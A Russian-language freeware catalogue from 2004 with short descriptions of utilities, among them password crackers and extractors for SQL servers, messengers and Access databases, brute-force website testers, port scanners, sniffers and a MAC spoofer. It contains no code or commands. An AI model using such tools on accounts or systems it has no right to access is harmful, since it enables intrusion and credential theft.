Программа для создания веб-страниц, возможно создание как визуально, так и вводом HTML кода, отлично подходит как для новичков веб-дизайнеров своей простотой, так и для настоящих профессионалов набором своих функций. Отличается от подобных разработок полной поддержкой всех функций CSS 1, обрабатывает веб-страницы со встроенным программным кодом разных форматов, имеет большое количество функций по работе с изображениями, в том числе автоматическая конвертация изображений в формат .jpg или .png, наложение графических эффектов на изображения и многое другое.
ОС: All Win
Тип программы: HTML

1/09/2004 System Safety Monitor
Программа отслеживает и отменяет изменения некоторых ключей реестра Windows, отвечающих за автоматический запуск приложений, защищая таким образом ваш компьютер от нежелательных действий некоторых приложений. Другая замечательная функция SSM - отслеживание запущеных приложений. Данная функция позволяет Вам контролировать какие приложения могут, а какие не могут быть запущены на вашем компьютере.
ОС: All Win
Тип программы: Мониторинг системы

31/08/2004 MultiComm
Программа для организации чата при помощи модемного соединения без подключения к Интернет, есть возможность пересылки файлов, а также запуска других программ требующих сетевого подключения. Программа имеет простой и понятный интерфейс.
ОС: All Win
Тип программы: Чат

30/08/2004 Abilon
Очень удобный RSS клиент, для просмотра XML/RSS лент. Программа обладает простым и понятным настраиваемым интерфейсом, системой фильтрации сообщений, функциями поиска и автоматического обновления RSS лент с интервалом времени заданным для каждой из них, кроме этого в программу встроена небольшая утилита, которая позволяет отправлять сообщения в следующие блоги: Blogger, LiveJournal. Отличительной особенностью данной программы является маленький размер дистрибутива (~600Кб) и нетребовательность дополнительных библиотек для своей работы.
ОС: Win 9x/Me/2k/XP
Тип программы: RSS

29/08/2004 Preferences Toolbar
Плагин для популярного веб-бразера Mozilla, который добавляет еще одну панель, цель которой облегчить работу как с самим браузером, так и серфинг в Интернете. Из полезных функций данной панели можно выделить возможность изменения User Agent браузера.
ОС: All Win
Тип программы: HTTP

28/08/2004 avast! Virus Cleaner
Небольшая утилитка для лечения компьютера от наиболее распространенных интернет-червей, на сегодняшней день программа способна очистить компьютер от следующих вирусов и их модификаций: Badtrans, Beagle (aka Bagle), Blaster (aka Lovsan), BugBear, Ganda, Klez, MiMail, Mydoom, Nachi (aka Welchia), NetSky (aka Moodown), Nimda, Opas (aka Opasoft, Opaserv), Parite (aka Pinfi), Sasser, Scold, Sircam, Sober, Sobig, Swen, Yaha (aka Lentin), Zafi и др..
ОС: All Win
Тип программы: Антивирусная защита

27/08/2004 Mac MakeUp
Утилита позволяющая подменять MAC адрес выбранного сетевого адаптера с возможностью работы через командную строку. Программа поддерживает работу с сетевыми адаптерами беспроводной связи. Кроме этого существует ряд полезных опций для изменения некоторых сетевых настроек.
ОС: Win NT/2k/XP
Тип программы: MAC

26/08/2004 Network Keeper
Инструмент предназначенный для администрирования сети. Обладает следующими возможностями:
+ построение дерева ЛВС с показом общих ресурсов серверов, а также некоторой информацией (IP хостов, тип ОС);
+ отображение информации о хосте (рабочая группа, MAC, IP, имя, платформа, тип сервера);
+ сканирование на обнаружение общих ресурсов (включая скрытые);
+ просмотр активных сетевых сессий на хосте и открытых файлов;
+ быстрый сканер IP-портов;
+ монитор сетевых подключений.
Каждая операция может контролироваться в логе.
ОС: Win NT/2k/XP
Тип программы: Мониторинг сети

25/08/2004 The Palace
Визуальный чат, общение в чате происходит в комнатах с фоновыми рисунками - фотографиями и рисованными изображениями, которые разделены по группам. К примеру если вы любите автомобили, вы можете разговаривать на фоне автомобилей. В отличие от скучных ников в остальных чатах, здесь вы можете надевать образы (скины).
ОС: All Win
Тип программы: Чат

23/08/2004 ForceSQL
Программа для подбора паролей к SQL серверу по словарю или брутфорсом со скоростью 40 слов в секунду.
ОС: All Win
Тип программы: Взломщики паролей

22/08/2004 Netdude
Программа для анализа и редактирования пакетов, перехваченных tcpdump. Программа состоит из разных модулей, например модуль для ARP, Ethernet, FDDI, ICMP, IP, Linux SLL, SNAP, TCP и UDP.
ОС: Unix
Тип программы: Мониторинг сети

21/08/2004 Spybot-Search&Destroy
Программа для обнаружения и удаления из системы "шпионских" модулей, которые время от времени появляются на жестком диске, особенно после установки якобы бесплатных программ. Характерная особенность программы - в случае, если удаление этого модуля приводит к наработоспособности программы, которой он принадлежит (впрочем, этот модуль на самом деле является совершенно самостоятельной программой), то Spybot-S&D способна подменить его пустышкой, которая, естественно, никаких данных о ваших предпочтениях ни собирать, ни отправлять не будет... Еще одна опция программы - удаление всех следов от прогулок по Интернету и вообще от проводившейся за компьютером работы. Программа умеет очищать кэш и историю, а также удалять cookies (поддерживаются браузеры Opera, IE и Netscape), а также очищать списки недавно открывавшихся файлов, запускавшихся программ и т.п.
ОС: All Win
Тип программы: Аудит безопасности

20/08/2004 WinXP SP2 TCP/IP Patcher
Стремясь снизить вероятность появления вирусно-червячных эпидемий, Microsoft во втором сервис-паке для Windows XP внесла ограничение в 10-ть TCP/IP-соединений на один процесс. В принципе, ничего плохого в этом нет, но только не для тех, кто скачивает файлы через сети общих ресурсов (eDonkey, Bittorrent, Gnutella и т.п.). Вот как раз для них и разработан этот патч, позволяющий увеличить в Windows XP SP2 число одновременных TCP/IP-соединений для одного процесса, по-умолчанию их число выставляется в 50.
ОС: Win XP
Тип программы: Патчи

19/08/2004 DiskInternals NTFS Reader
Программа для обеспечения доступа к NTFS/NTFS 5 разделам из ОС MS Windows 9x. При работе с NTFS разделами игнорируются все права доступа, поэтому возможно получить доступ к абсолютно любому файлу раздела. Из дополнительных возможностей программы стоит отметить:
+ возможность работы со сжатыми и зашифрованными файлами;
+ создание и монтирование образа NTFS диска;
+ сохранение заблокированных файлов, таких как $MFT, $Bitmap, $boot, файлы реестра, Swap-файлы и др.
ОС: All Win
Тип программы: Дисковые утилиты

18/08/2004 Simple FTP Monitor
Программа по отслеживанию изменений интересующих Вас FTP-серверов. Можно одним махом проверить доступность группы FTP-серверов и посмотреть не появилось ли чего нового (как в корне, так и в указанной директории - настраивается внутри программы).
ОС: All Win
Тип программы: FTP

17/08/2004 Partition Resizer
Программа, позволяющая изменять размеры уже существующих и размеченных разделов жестких дисков без уничтожения записанных на них данных. Поддерживаются следующие типы DOS и Windows разделов: FAT12, FAT16 и FAT32. Работает с дисками объемом до 2Тбайт.
ОС: DOS
Тип программы: Дисковые утилиты

16/08/2004 FileBlocker Complex
Программа для защиты файлов от несанкционированного использования на томах FAT, FAT32. Осуществляет защиту заблокированных файлов паролем (т.е. пароль спрашивается при доступе к интерфейсу разблокирования, никаких изменений в сами файлы не вносится) от любого пользователя компьютера. Кроме этого, возможна защита файлов от сетевых пользователей даже тогда, когда ни один пользователь не работает за машиной в интерактивном режиме - например, система включена, но еще никто не ввел пароль. Реализация - в виде службы Windows.
ОС: Win NT/2k/XP
Тип программы: Файловые утилиты

15/08/2004 Nico's Photocopier
Программа, которая превратит ваш сканер и принтер в ксерокс. Программа очень проста в управлении, для создания копии, необходимо задать всего несколько параметров (цвет, масштаб и количество копий) и нажать кнопку "Copy". Программа автоматически найдет подключенный сканер и распечатает необходимое число копий на используемом по-умолчанию принтере.
ОС: All Win
Тип программы: Прочее

14/08/2004 Dup Detector
Программа для поиска дубликатов изображений по различным параметрам, таким как яркость, гамма, композиция, пропорциональные отличия и др. Возможно установить коэффициент соответствия. Существует 3 режима поиска дубликатов: между элементами одного списка, между элементами разных списков и сравнение одного изображения со всеми элементами списка.
ОС: All Win
Тип программы: Файловые утилиты

13/08/2004 nLite
Программа для удаления из инсталяций ОС Windows 2000/XP/2003 ненужных компонентов таких как Media Player, Internet Explorer, Outlook Express, MSN Explorer, Messenger, драйвера устройств, языки и многое др. Что позволяет уменьшить размер дистрибутива и время затрачиваемое на установку ОС. После удаления компонентов созданная можификация Windows может быть сохранена в виде ISO образа. Для работы программы необходимы библиотеки .Net Framework.
ОС: Win 2k/XP
Тип программы: Системные утилиты

12/08/2004 MaxBlast
Программа позволяет создать загрузочную дискету с набором утилит от производителя жестких дисков Maxtor, которые позволят установить в систему и подготовить к работе жесткий диск.
Основные возможности программы:
+ идентификация диска в системе, в том числе, если он не определяется в системе из-за не поддерживаемого BIOS большого объема;
+ разбиение дискового пространства на логические диски;
+ форматирование жесткого диска;
+ и многое другое.
Программа проста в использовании благодаря дружественному графическому интерфейсу с поддержкой мыши и подойдет для эксплуатации даже неопытному пользователю.
ОС: All Win
Тип программы: Дисковые утилиты

11/08/2004 MountVD
Утилита позволит представить любую директорию как виртуальный диск. Однажды проинсталлировав MountVD Вы просто выбираете директорию, кликаете правой кнопкой мышки, задаете букву нового диска и все готово. Возможно также сделать так чтобы виртуальные диски подключались автоматически при старте Windows.
ОС: All Win
Тип программы: Дисковые утилиты

10/08/2004 Anubis
Программа для организации SMTP туннеля между MUA и MTA, кроме этого программа позволяет производить анонимную отправку электронной почты. На сегодняшний день программа имеет следующие особенности: поддержка защифрованных TLS/SSL подключений, поддержка анонимных ремейлеров Type-I Cypherpunks и Type-II Mixmaster, поддержка GnuPG(PGP), поддержка соединений через SOCKS-прокси, поддержка авторизаци в ESMTP и ряд других полезных возможностей.
ОС: Unix
Тип программы: Почта

9/08/2004 CS Fire Monitor
Монитор системы, предназначенный для наблюдения за состоянием системы и некоторых ее составляющих частей. Основные разделы мониторинга:
+ Bandwidth Monitor (монитор наблюдения за количеством проходящего трафика через заданное соединение);
+ CPU Monitor (монитор загрузки процессора, отображающий текущию скорость работы процессора, тип процессора, рельную частоту процессора);
+ Drives Monitor (отображение информации об установленных в системе жестких дисков);
+ Hardware Monitor (вывод информации об установленных в системе устройствах с возможностью удаления или добавления новых);
+ IP Monitor (монитор изменения Интернет/локального IP адреса с возможностью отправки E-mail при изменении IP адреса);
+ Memory Monitor (монитор использования физической, виртуальной памяти и кэша, а так же вывод информации об общем объеме установленной физической памяти в систему);
+ Netstats Monitor (мониторинг всех текущих сетевых соединений);
+ Processes Monitor (монитор всех запущенных процессов в системе с возможностью получению подробной информации о каждом из них);
+ Services monitor (отображение всех запущенных сервисов в системе);
+ Software Monitor (информация об установленных в системе программ).
ОС: Win 2k/XP
Тип программы: Мониторинг системы

8/08/2004 Русский справочник по Win32 API
Русский справочник по Win32 API представляет собой перевод MSDN и справки по Win32 API, поставляемой с Borland C++Builder. Обновление справочника происходит примерно раз в две недели. Справочник распространяется совершенно бесплатно.
ОС: All Win
Тип программы: Документация

7/08/2004 FTPInfo
Программа следить за обновлениями на выбранных FTP серверах. При наличии изменений на сервере (появление, удаление или обновление файлов) программа известит Вас об этом и создаст отчет. Созданный отчет автоматически может быть передан на любой FTP сервер или разослан по e-mail.
Программа позволяет:
- следить за состоянием FTP серверов (доступен или нет);
- следить за появлением, удалением или изменением файлов на FTP серверах;
- скачивать выбранные файлы с FTP серверов с возможностью регулирования скорости;
- формировать отчеты об изменениях на FTP сервере в любом виде;
- передавать сформированные отчеты на FTP сервер или по e-mail;
- доступ к почтовому серверу может производиться с SMTP аутентификацией;
- производить поиск файлов среди отсканированных серверов;
- производить поиск FTP серверов в указанном диапазоне адресов.
ОС: All Win
Тип программы: FTP

6/08/2004 MessenPass
Программа предназначенная для восстановления(получения или расшифровки) паролей наиболее используемых Интернет пейджеров, таких как:
+ MSN Messenger;
+ Windows Messenger (In Windows XP);
+ Yahoo Messenger 5.x/6.x;
+ ICQ Lite 4.x/2003;
+ AOL Instant Messenger;
+ AOL Instant Messenger/Netscape 7;
+ Trillian;
+ Miranda;
+ GAIM.
Кроме графического пользовательского интерфейса, существует возможность выполнения команд через консоль.
ОС: All Win
Тип программы: Взломщики паролей

5/08/2004 Stellar TFTP
Программа для работы по TFTP. Программа может работать как сервер или клиент, может быть установлена как сервис, есть возможность протоколирования сеансов работы и применения настроек безопасности. Кроме этого в комплект программы входят DLL с описанием встроенных в них процедур, что позволяет их использовать в других программах, где необходима работа по TFTP.
ОС: Win NT/2k/XP
Тип программы: TFTP

4/08/2004 BIOS Patcher
Программа, способная находить и исправлять ошибки в Award BIOS-е, а так же добавлять(открывать/разблокировать) новые возможности, т.е. уже имеющиеся, только по каким-то причинам "закрытые" производителем платы. Программа поддерживает работу с BIOSами емкостью: 1Mbit (128kB), 2Mbit (256kB), 4Mbit (512kB), версии: Award 4.5x, Award(Phoenix) 6.xx, "платформы": Pentium - Socket5, Socket7, SuperSocket7, Pentium II/III Socket8/Slot1/Socket370(PPGA/FC-PGA/FC-PGA2), AMD K7 - Slot-A, SocketA, Pentium 4 (Socket423/Socket478), а так же "асусовский стандарт" упаковки модулей биоса (который появился, начиная с CUSL/TUSL).
Основные возможности программы:
+ добавление поддержки новых CPU(процессоров);
+ добавление поддержки HDD объёмом вплоть до 120Gb;
+ добавление возможности выбора большего диапазона частот в BIOS Setup;
+ добавление возможности включения асинхронного режима работы с памятью(+PCI) на VIA 693A/694X/694T;
+ и многое другое.
ОС: All Win
Тип программы: Железо

2/08/2004 SmartSniff
Этот сниффер перехватывает TCP/IP пакеты, проходящие через сетевую карту и представляет пользователю отчет в виде списка комманд, которыми обмениваются клиент и сервер.
ОС: All Win
Тип программы: Мониторинг сети

1/08/2004 Squid Efficiency Analyzer
Утилита обрабатывает лог-файлы от Squid и представляет отчет о том сколько траффика взято из кеша, а сколько пришло из Интернета.
ОС: Win NT/2k/XP
Тип программы: Мониторинг сети

30/07/2004 YAPS
YAPS или "Yet Another Port Scanner"("еще один порт-сканер") это как видно из названия сканер портов. Вот что он умеет:
+ сканирует несколько адресов одновременно;
+ может работать через коммандную строку;
+ настраиваимая задержка сканирования;
+ весит всего 72КБ.
ОС: All Win
Тип программы: Сканеры портов

29/07/2004 Word Extractor
Это маленькая программа поможет исследователю отделить значащие символы(буквы и цифры) от мусора в файле любого типа. Результат работы программы - листинг в котором все "ненужные" символы заменены точками или пробелами.
ОС: All Win
Тип программы: Текстовые утилиты

24/07/2004 Zero Assumption Digital Image Recovery
Утилита предназначена для восстановления удаленных изображений из цифрового фотоаппарата.
Поддерживает следующие форматы:
+ GIF;
+ JPEG;
+ TIFF;
+ CRW - Canon RAW data;
+ MOV - QuickTime movie;
+ WAV - Waveform audio.
ОС: All Win
Тип программы: Восстановление информации

23/07/2004 SmartFix
Программа поможет закрыть уязвимости в Windows и Internet Explorer, проверит компьютер на наличие червей, вирусов и шпионских программ.
ОС: All Win
Тип программы: Аудит безопасности

22/07/2004 Simply Safe Backup
Программа призвана облегчить резервное копирование информации. Simply Safe Backup может записать бекап на CD или DVD или переслать на FTP-сервер.
ОС: All Win
Тип программы: Резервное копирование

21/07/2004 FSG
Упаковщик разработанный специально для работы с файлами маленького размера. Лучше всего FSG сжимает программы написанные на ассемблере. Может работать через командную строку.
ОС: All Win
Тип программы: Файловые утилиты

20/07/2004 BySoft Network Monitor
Утилита поможет уследить за всеми сетевыми адаптерами. Каждую секунду программа будет обновлять:
+ скорость и размер входящего и исходящего трафика;
+ пакеты принятые или посланые с ошибкой;
+ тип адаптера;
+ МАС адрес;
+ и многое другое.
ОС: All Win
Тип программы: Мониторинг сети

19/07/2004 Secrets-Editor
Простая утилита для шифрования файлов. Шифрует по алгоритмам SHA-1 или AES. Доступны версии программы для Windows и UNIX.
ОС: Cross-platform
Тип программы: Криптография

18/07/2004 HSRemove
Программка удаляет вредного рекламного паразита Home Search Assistant (другое название Home Search Hijacker).
ОС: All Win
Тип программы: Антивирусная защита

14/07/2004 NeoMail
Почтовый клиент с веб-интерфейсом который может быть поставлен на любой почтовый сервер.
Присутствуют такие полезные свойства как:
+ поддержка русского языка;
+ возможность пересылать вместе с письмом несколько вложений;
+ встроенный редактор интерфейса;
+ возможность настроить размер исходящих писем.
ОС: Unix
Тип программы: Почта

13/07/2004 Mathopd
Очень маленький и шустрый вебсервер. Он не сможет работать с ненужными(по мнению автора программы) наворотами HTTP.
Поддерживает:
+ некоторые полезные функции HTTP/1.1;
+ CGI/1.1.
Есть возможность скачать исходники с сайта автора.
ОС: Unix
Тип программы: HTTP

12/07/2004 NetBrute Scanner
Пакет из трех программ для аудита безопасности.
+ NetBrute сканирует компьютеры на предмет расшаренных ресурсов;
+ PortScan сответственно сканирует порты;
+ WebBrute проверяет стойкость парольной защиты вебсайтов.
ОС: Win NT/2k/XP
Тип программы: Сетевые сканеры

11/07/2004 WKTVBDebugger
Дебаггер для программ на Visual Basic скомпилированных в псевдокоде (P-Code). Программа позволит сэкономить время изучения исследуемой программы в разы по сравнению с продиранием простым дебаггером через виртуальную машину.
ОС: All Win
Тип программы: Реверсинг

10/07/2004 S-Tools
Программа для сокрытия важных данных с помощью стеганографии. S-Tools умеет прятать в файлы в форматах BMP и GIF и WAV. Шифрование производится по алгоритмам IDEA, DES, 3DES и MDC.
ОС: All Win
Тип программы: Криптография

9/07/2004 Process Logger
Process Logger поможет вам отследить деятельность любого пользователя, работающего на вашем компьютере. Кроме того, если вы системный администратор, программа поможет вам отследить деятельность пользователей на рабочих станциях вашей сети.
ОС: All Win
Тип программы: Мониторинг системы

8/07/2004 TurboEncoder
Эта компактная (207Кб) программка позволяет не только шифровать файлы но и сжимать их. В качестве исходного файла программе можно указать URL и она сама скачает и зашифрует файл.
ОС: Win NT/2k/XP
Тип программы: Криптография

7/07/2004 NoMess
Утилита поможет отключить Windows Messenger Service, который часто используется для проникновения на компьютер.
ОС: Win NT/2k/XP
Тип программы: Патчи

6/07/2004 Belarc Advisor
Эта программа проверит какие железо, программы и патчи для Windows установлены на компьютере и выдаст детальный отчет в ваш браузер.
ОС: All Win
Тип программы: Системные утилиты

5/07/2004 All-in-One SECRETMAKER
Утилита заметно облегчит Вам работу на компьютере. Она умеет:
+ удаляет Cookie;
+ блокирует баннеры и всплывающие окна;
+ обнаруживает спам в вашем ящике;
+ предотвращает распространение сетевых червей вашим зараженным компьютером;
+ и многое другое.
ОС: All Win
Тип программы: Системные утилиты

27/06/2004 Hall of the Montain King
Программа умеет останавливать время для отдельно взятых процессов, причем останавливать как полностью, так и частично.
Основное назначение программы - помощь в анализе поведения различных систем тогда, когда время не движется или ограниченно движется.
Более подробное описание - см.страничку разработчика.
ОС: Win NT/2k/XP
Тип программы: Системные утилиты

18/06/2004 RESFREE
Очень помогает уменьшить загрузку ЦП в многозадачных ОС (OS/2, Windows NT/2000) при работе старых программ (в т.ч. ФоксПро и его приложений). Пpогpамма пpи pаботе отслеживает обpащение к клавиатуpе и в случае если пpоцесс злоупотpебляет вызовом int 16h, освобождает квант пpоцессоpного вpемени, pанее затpачивавшийся на бесполезный пpостой и обpаботку ненажатой клавиши. Этим гpешат все пpогpаммы, не имеющие встpоенной поддеpжки отдачи квантов и специально не pасчитанные на использование под многозадачными системами. Размер программы - 488 байт =)
ОС: Win 9x/Me/2k
Тип программы: Прочее

17/06/2004 Proxomitron
Программа для ускорения работы с Интернетом и уменьшения входящего трафика, это достигается при помощи использования специальных фильтров. Основные функции программы:
+ Выключать или ограничивать загрузку рекламных окон
+ Контролировать MIDI музыку и звуки
+ Замораживать анимированные GIF'ы - грузить только первый кадр
+ Убивать большинство рекламных баннеров
+ Останавливать логотипы и другие скрипты
+ Блокировать появление окон подтверждения
+ Блокировать медленные счетчики
+ Блокировать "авто-обновление" страниц
+ Удалять динамический HTML
+ Предотвращать "зависания" некоторых фреймов
+ Полностью удалять фреймы или таблицы
+ Убивать или изменять выбранные Java скрипты или апплеты
+ Добавлять ваши собственные скрипты на страницы!
+ Удалять или заменять фоновые рисунки
+ Останавливать бегущий текст в строке статуса
+ Показывать URL, замененные текстом в строке статуса
+ Преобразовывать мигающий текст в полужирный
+ Удалять нетскейповские слои и CSS
и многое другое, кроме всего этого программа может редактировать информацию, которую передает интернет-браузер в заголовке HTTP запроса. Программа имеет русский интерфейс.
ОС: All Win
Тип программы: HTTP

16/06/2004 Anti-Spam SMTP Proxy
Anti-Spam SMTP Proxy (или ASSP) представляет собой мультиплатформенный почтовый фильтр, предназначенный для защиты от спама и вирусов SMTP-сервера. Может работать с различными MTA: Sendmail, qmail, Postfix, Imail, Exchange, Courier, Mercury, Lotus Notes etc. Имеет большой инструментарий по ведению списков ("белых", "чёрных", "серых"), возможность подключения байесовых фильтров. При тестировании на вирусы использует базы данных популярного антивируса ClamAV. Имеет много других полезных функций. Распространяется в исходных кодах.
ОС: Cross-platform
Тип программы: Прокси-сервер

15/06/2004 World Hopper
Небольшая программа на Перле, написанная голландцем Vincent 'rastakid' van Scherpenseel. Представляет собой прокси-сервер, вешающийся на порт 1337 (по умолчанию) и ожидает обращения клиента (метод CONNECT). При поступлении запроса сам строит цепочку ананомных прокси-серверов, используя предварительно сформированный файл со списком. ПРоверялся при работе протоколов telnet, pop3 и irc (помимо HTTP).
ОС: Cross-platform
Тип программы: Прокси-сервер

14/06/2004 Isoqlog
Isoqlog представляет собой программу, написанную на С, основное назначение которой - анализ лог-файлов почтовых серверов (MTA). Споспобна работать с sendmail, qmail, postfix, exim и на основе анализа выводить результаты в HTML-формате для дальнейшего анализа посредством браузера. Способна строить статистику по доменам с полями - отправитель, получатель, количество переданных быайтов. Способна строить ежедневную, месячную и годовую статистику. Крайняя версия (выпущена 29 мая) - 2.2, в которой, кстати, есть и возможность вывода статистики на русском языке. Наверняка будет представлять интерес для администраторов серверов. Поставляется как в исходном коде, так и в форматах .deb (для дистрибутивов Debian), так и в .rpm (Red Hat и клоны).
ОС: Unix
Тип программы: Мониторинг системы

13/06/2004 TCode
Декодер русских текстов. Предназначен для автоматического восстановления русских текстов, испорченных в процессе передачи по электроной почте, в том числе многократно перекодированных.
Восстановление производится путем перебора комбинаций перекодировок и распознаванием полученных слов с помошью быстрого эвристического алгоритма, основанного на особенностях построения слов русского языка.
При восстановлении поддерживаются кодировки DOS, Windows, KOI-8, ISO 8859-5, а также преобразования текста из форматов Base64, UUE, XXE, Quoted-Printable, RTF, HTML, UTF-8 и транслит.
ОС: All Win
Тип программы: Текстовые утилиты

12/06/2004 Crap Cleaner
Утилита для удаления таких ненужностей как:
+ cookies;
+ кеш браузера;
+ лишние данные в registry;
+ временные файлы создаваемые Windows.
Перед удалением программа покажет все что нашла ненужного и даст возможность Вам подкорректировать ее.
ОС: All Win
Тип программы: Системные утилиты

11/06/2004 Cryptainer LE
Программа позволяет создавать криптографически защищенные контейнеры для хранения важной информации. Контейнер открывается паролем и становится новым логическим диском в системе с которым можно делать все что угодно.
ОС: All Win
Тип программы: Криптография

10/06/2004 CheckP3
Почтовый клиент, позволяющий работать с почтой непосредственно на сервере. Дополнительными функциями программы является:
+ поддержка работы с POP3/IMAP4 сервером;
+ поддержка работы с Hotmail аккаунтами;
+ показ полного заголовка сообщение;
+ работа через Firewall (SOCKS/4/4a/5 с аутентификацией);
+ наличие окна отладки, позволяющего отслеживать команды посылаемые почтовому серверу и возращаемые им ответы;
+ возможность сохранения, удаления и просмотра сообщений непосредственно с сервера;
+ возможность выбора места для сохранения настроек программы: в реестре или в ini файле;
+ программа имеет один .exe файл и для своей работы не требует дополнительных библиотек;
+ при получении новых сообщений возможность выполнения различных способов оповещения, включая поддержку MS Agent;
+ отправка сообщений непосредственно из программы, используя внешний или встроенный SMTP сервер;
+ встроенный анти-спам фильтр;
+ и прочее.
ОС: All Win
Тип программы: Почта

9/06/2004 VisualZone Report Utility
Анализатор логов для ZoneAlarm и ZoneAlarm Pro. При анализе логов обрабатывается вся доступная для обработки информация, при формирование отчета вся эта информация представляется в легко читаемом виде. Дополнительной, очень полезной возможностью является возможность автоматической обратной трассировки для уточнения сведений о нападающем и показ его местоположения на карте.
ОС: All Win
Тип программы: Прочее

8/06/2004 Mousesoft Directory Size
Простая в использование утилита, которая позволяет получить информацию о размерах каждой из папок заданного каталога. Это позволяет постоянно контролировать размеры папок и при необходимости производить их чистку. Дополнительной возможностью программы, является возможность экспортировать полученный список в текстовый, HTML или Excel формат.
ОС: Win 9x/Me/2k/XP
Тип программы: Системные утилиты

7/06/2004 Free Pascal
Кроссплатформленный (Intel x86, Motorola 680x0 и PowerPC) 32х-разрядный компилятор языка Pascal, поддерживает работу в следующих ОС: Linux, FreeBSD, NetBSD, MacOSX, DOS, Win32, OS/2, BeOS, SunOS (Solaris), QNX и Classic Amiga. Поддерживает синтаксис Turbo Pascal 7.0 и Delphi. В качестве дополнения, стоит выделить, поддержку дополнительных расширений, таких как:
+ Object Pascal на уровне Delphi 3, и немного от Delphi 4;
+ перегрузка (overloading) функций и процедур, в том числе перегрузка операторов сравнения (<, >, =, <=, >=), арифметических (+, -, *, /, **, div, mod), и оператора присваивания (:=);
+ поддержка inline-функций и процедур, в отличие от Borland Pascal, такие подпрограммы не требуется писать в машинных кодах;
+ поддержка примитивных макросов;
+ поддержка операторов присваивания с выполнением некоторого арифметического действия (+=, -=, *=, /=);
+ работа с динамическими массивами;
+ и многое другое.
ОС: Cross-platform
Тип программы: Программирование

6/06/2004 Cygwin
Динамическая библиотека, которая реализует возможность использовать Linux API функции на MS Windows платформах, что позволяет использовать программы, написанные под Unix платформы в среде MS Windows. Кроме этого Cygwin позволяет производить кросс-компиляцию (создание бинарного кода на одной платформе под другую) UNIX'овго софта, основным отличием этой программы от подобных аналогов является очень хорошо продуманный компилятор gcc с большим набором разнообразных библиотек.
ОС: All Win
Тип программы: Программирование

5/06/2004 Database Password Sleuth
Восстановление забытого или неизвестного пароля от баз данных с расширением ".mdb", созданных Microsoft Access 95/97/2000/2002. Программа очень проста в использование, для получения программы необходимо указать путь к необходимой БД и нажать кнопку получения пароля в окне программы. Для получения пароля программа не использует подбор пароля перебором символов.
ОС: All Win
Тип программы: Взломщики паролей

4/06/2004 BRS WebWeaver
Удобный, небольшой по размеру дистрибутива и довольно шустрый веб-сервер, который для своей работы требует мало ресурсов, например при доступе 1000 посетителей/секунду загружает память только на 4Мб. Основные функции и возможности программы:
+ встроенный FTP сервер для загрузки страниц на веб-сайт, используя удаленный доступ к веб-серверу;
+ поддержка работы с несколькими потоками одновременно;
+ поддержка ISAPI, SSI, CGI/1.1 и PHP;
+ обладает высокой гибкостью настроек;
+ защита паролем заданных веб-сайтов или каталогов;
+ возможность блокировки доступа к веб-ресурсам с заданных IP адресов;
+ обработчик ошибок при обращении к серверу;
+ вывод содержимого каталогов;
+ возможность добавления своих MIME типов;
+ и многое другое.
ОС: All Win
Тип программы: HTTP

3/06/2004 Anti Port Sanner
Основное назначение утилиты состоит в прослушивании нескольких сотен портов (описанных в обновляемой базе данных программы), имитации наличия на них уязвимых сервисов и анализа всех подключений по этим портам.
ОС: All Win
Тип программы: Мониторинг сети

2/06/2004 Trillian Recovery Pro
Программа для расшифровки паролей из файлов настроек пользователя мультипротокольного клиента мгновенных сообщений Trillian, результат расшифровки представляется в удобно читаемом текстовом виде. Поддерживаются все версии Trillian.
ОС: All Win
Тип программы: Взломщики паролей

1/06/2004 APIx - Visual WinAPI
Визуальная среда проектирования WinAPI-программ, позволяющая пользователю за очень короткое время и без особых усилий создать полноценную программу на "чистом" WinAPI. Пользователю, при этом, требуется иметь хотя бы поверхностные знания в области программирования на Delphi. APIx не является компилятором, поэтому у вас на компьютере уже должен быть установлен Borlad Delphi (4 - 7) или консольный компилятор DCC32.EXE. Интерфейс среды внешне напоминает интерфейс Borland Delphi. Для полнофункционального использования APIx необходимо пройти бесплатную регистрацию.
ОС: All Win
Тип программы: Программирование

31/05/2004 Codex
Данная программа позволяет облегчить подготовку к публикации исходных кодов различных программ с использованием заданного стиля и подсветкой синтаксиса специфичного для каждого из известных языков программирования. Результат обработки может быть экспортирован в HTML, RTF или TeX формат, или автоматически опубликован на указанном веб-сайте через FTP. Программе известно около 50 различных спецификаций подсветок синтаксиса и форматирования исходного кода, среди них: Assembler, C#, C/C++, CSS, COBOL, HTML, Java, JavaScript, MS VBScript, Object Pascal, Perl, PHP, Ruby, SQL, Tcl/Tk, UNIX Shell Script, Visual Basic, XML и многие другие.
ОС: All Win
Тип программы: HTML

30/05/2004 Bootable CD Wizard
Менеджер загрузки с компакт-дисков. Позволяет создавать мульти-загрузочные (Multiple-Image Bootable CD) CD для компьютеров, которые не поддерживают мульти-загрузку с CD-драйва. Позволяет создавать мульти-язычное, иерархическое меню загрузки с настраиваемым внешним видом. Поддерживает расширенный набор форматов загрузочных образов. Если хорошо постараться получается мощное аварийное средство со всем необходимым софтом.
ОС: All Win
Тип программы: Дисковые утилиты

29/05/2004 Firewall Monitor (fwmon)
Монитор, предназначенный для анализа в реальном времени событий (вторжений, атак и т.д.) встроенного файрволла Linux - ipchains/Iptables. Может быть запущен в chroot-среде для повышения безопасности. Позволяет также связать выводимый формат с SQL-базами данных (MsSQL, например). Текущая версия 1.1.0. Распространяется на условиях GPL версии 2. Доступен в в виде исходников, в виде SRPM и RPM-пакетов.
ОС: Unix
Тип программы: Firewall

28/05/2004 Karen's Replicator
Программа обеспечивает резервное копирование файлов.
+ интервалы копирования от нескольких минут до нескольких месяцев;
+ можно указать дни (например выходные) когда копировать не нужно;
+ поддерживает файлы более 2ГБ
ОС: All Win
Тип программы: Резервное копирование

27/05/2004 Jetico Personal Firewall
+ защищает как от атак извне так и от попыток выйти в сеть программ, у которых нет на то разрешения;
+ возможность редактировать настройки безопасности или выбрать из нескольких стандартных вариантов;
+ замечает такие программы аудита безопасности как AWFT, DNStest, Copycat, FireHole, Ghost, LeakTest, MBTest, Outbound, PCAudit, PCAudit2, Thermit, TooLeaky, WallBreaker, Yalta и Yalta Advanced.
ОС: All Win
Тип программы: Firewall

26/05/2004 Cheops
Cheops представляет собой ПО с открытым исходным текстом, основной назначение которого - мониторинг и вывод в реальном времени состояния администрируемой (или контролируемой ;)) сети. Написан с использованием GIMP Tool Kit, GTK+, также включена поддержка Gnome. Изначально был разработан студентом Марком Спенсером для ОС Linux, однако портирован и на другие ОС. Позволяет в реальном масштабе времени наблюдать за состоянием сети, при этом выводит к каждому хосту кучу нужной информации: IP, запущенные сетевые сервисы, тип ОС (определение построено на основании алгоритма, разработанного в довольно известном сканере Queso). Распространяется на условиях GPL.
ОС: Unix
Тип программы: Мониторинг сети

